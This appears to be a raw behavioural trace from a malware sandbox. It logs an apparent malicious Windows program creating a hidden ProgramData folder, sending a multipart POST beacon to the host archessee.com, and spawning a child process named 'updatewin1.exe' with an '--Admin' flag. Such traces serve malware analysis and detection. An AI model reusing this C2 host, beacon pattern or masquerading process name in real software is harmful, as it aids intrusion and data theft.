[0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f8e268 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8e2e8 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x31) returned 0x2f8e320 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e2e8 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f8e2e8 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x50) returned 0x2f8e360 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x59) returned 0x2f8e3b8 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e360 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x9) returned 0x2f82d80 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f8e360 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x51) returned 0x2f8e420 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e360 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f8d6d0 [0116.280] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.280] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8e360 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8e480 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f8d6f8 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8e4b8 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x39) returned 0x2f8e4f0 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e4b8 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e398 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x50) returned 0x2f8e538 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x59) returned 0x2f8e590 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e538 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e4b8 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8e538 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2d) returned 0x2f8e5f8 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e538 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e538 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f8e630 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x41) returned 0x2f8e678 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e630 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e558 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f8e630 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x51) returned 0x2f8e6c8 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e630 | out: hHeap=0x2f80000) returned 1 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f8e578 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8e630 [0116.281] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x39) returned 0x2f8e728 [0116.281] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e630 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e788 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f8d720 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f8d748 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8e630 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x39) returned 0x2f8ef70 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e630 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e7a8 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8e630 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2d) returned 0x2f8efb8 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8e630 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f8e4d8 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8e630 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f8eff0 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8f008 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f8f040 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8f058 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e7c8 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f090 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2d) returned 0x2f8f0c8 [0116.282] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f090 | out: hHeap=0x2f80000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f8f090 [0116.282] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f8f100 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x51) returned 0x2f8f148 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f100 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f8d770 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f100 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x39) returned 0x2f8f1a8 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f100 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e7e8 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f100 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2d) returned 0x2f8f1f0 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f100 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e808 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8f100 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e828 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f228 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2d) returned 0x2f8f278 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f228 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8f2b0 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x40) returned 0x2f8fa60 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x41) returned 0x2f8faa8 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8fa60 | out: hHeap=0x2f80000) returned 1 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e848 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f2e8 [0116.283] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2d) returned 0x2f8f320 [0116.283] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f2e8 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f8f0a8 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f2e8 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x39) returned 0x2f8fa60 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f2e8 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0xd) returned 0x2f8f228 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f2e8 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x39) returned 0x2f8faf8 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f2e8 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x11) returned 0x2f8e868 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f2e8 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2d) returned 0x2f8f358 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f2e8 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x19) returned 0x2f8d798 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f2e8 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x31) returned 0x2f8fb40 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f2e8 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f8fb80 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f2e8 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x3d) returned 0x2f8fbb0 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f2e8 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f8d7c0 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8f2e8 [0116.284] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.284] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f8d7e8 [0116.285] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8f390 [0116.285] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x1d) returned 0x2f8d810 [0116.285] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x29) returned 0x2f8f3c8 [0116.285] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d680 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x21) returned 0x2f8fbf8 [0116.285] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8d680 | out: hHeap=0x2f80000) returned 1 [0116.285] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f400 [0116.285] Sleep (dwMilliseconds=0x64) [0116.452] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f628 | out: lpSystemTimeAsFileTime=0x18f628*(dwLowDateTime=0x20c30760, dwHighDateTime=0x1d5fd35)) [0116.452] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x2) returned 0x2f8f138 [0116.452] GetTickCount () returned 0x114df58 [0116.452] GetLastError () returned 0x0 [0116.452] CreateDirectoryA (lpPathName="C:\\ProgramData\\2YM26E6PQJEMM4AB0REXRXCLL" (normalized: "c:\\programdata\\2ym26e6pqjemm4ab0rexrxcll"), lpSecurityAttributes=0x0) returned 1 [0116.453] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\2YM26E6PQJEMM4AB0REXRXCLL" (normalized: "c:\\programdata\\2ym26e6pqjemm4ab0rexrxcll")) returned 1 [0116.454] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f438 [0116.454] CreateDirectoryA (lpPathName="C:\\ProgramData\\2YM26E6PQJEMM4AB0REXRXCLL\\files" (normalized: "c:\\programdata\\2ym26e6pqjemm4ab0rexrxcll\\files"), lpSecurityAttributes=0x0) returned 1 [0116.454] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f438 | out: hHeap=0x2f80000) returned 1 [0116.454] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x7a120) returned 0x4760048 [0116.464] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d838 [0116.464] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x20) returned 0x2f8d860 [0116.464] GetLastError () returned 0x0 [0116.465] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0117.159] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18f4e4, dwBufferLength=0x4) returned 1 [0117.159] InternetConnectA (hInternet=0xcc0004, lpszServerName="archessee.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0117.159] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x41, lpBuffer=0x1, dwBufferLength=0x0) returned 0 [0117.159] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/517", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0117.160] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x80) returned 0x2f8fc28 [0117.160] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0117.160] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0117.161] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0117.161] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0117.161] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8fc28 | out: hHeap=0x2f80000) returned 1 [0117.161] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x30) returned 0x2f8f438 [0117.161] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x47) returned 0x2f8fc28 [0117.161] HeapFree (in: hHeap=0x2f80000, dwFlags=0x0, lpMem=0x2f8f438 | out: hHeap=0x2f80000) returned 1 [0117.161] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A", dwHeadersLength=0x3f, dwModifiers=0x20000000) returned 1 [0117.161] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Length: 25", dwHeadersLength=0x12, dwModifiers=0x20000000) returned 1 [0117.161] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x4760048*, dwOptionalLength=0x19) Thread: id = 110 os_tid = 0xa48 Thread: id = 111 os_tid = 0x314 Thread: id = 112 os_tid = 0x6c8 Thread: id = 113 os_tid = 0x34c Process: id = "10" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" page_root = "0x45d42000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x994" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 106 os_tid = 0xa6c [0113.733] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x1fc1f2e0, dwHighDateTime=0x1d5fd35)) [0113.733] GetCurrentProcessId () returned 0xa70 [0113.733] GetCurrentThreadId () returned 0xa6c [0113.733] GetTickCount () returned 0x114d8c3 [0113.733] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23396308195) returned 1 [0113.740] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0113.740] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x260000 [0113.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.741] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0113.741] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0113.742] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0113.742] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0113.742] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.742] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.742] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.742] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.742] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.742] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.742] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.742] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.743] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.743] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.743] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.744] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.744] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.744] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x214) returned 0x2607d0 [0113.744] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.744] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.744] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.744] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.744] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.745] GetCurrentThreadId () returned 0xa6c [0113.745] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, 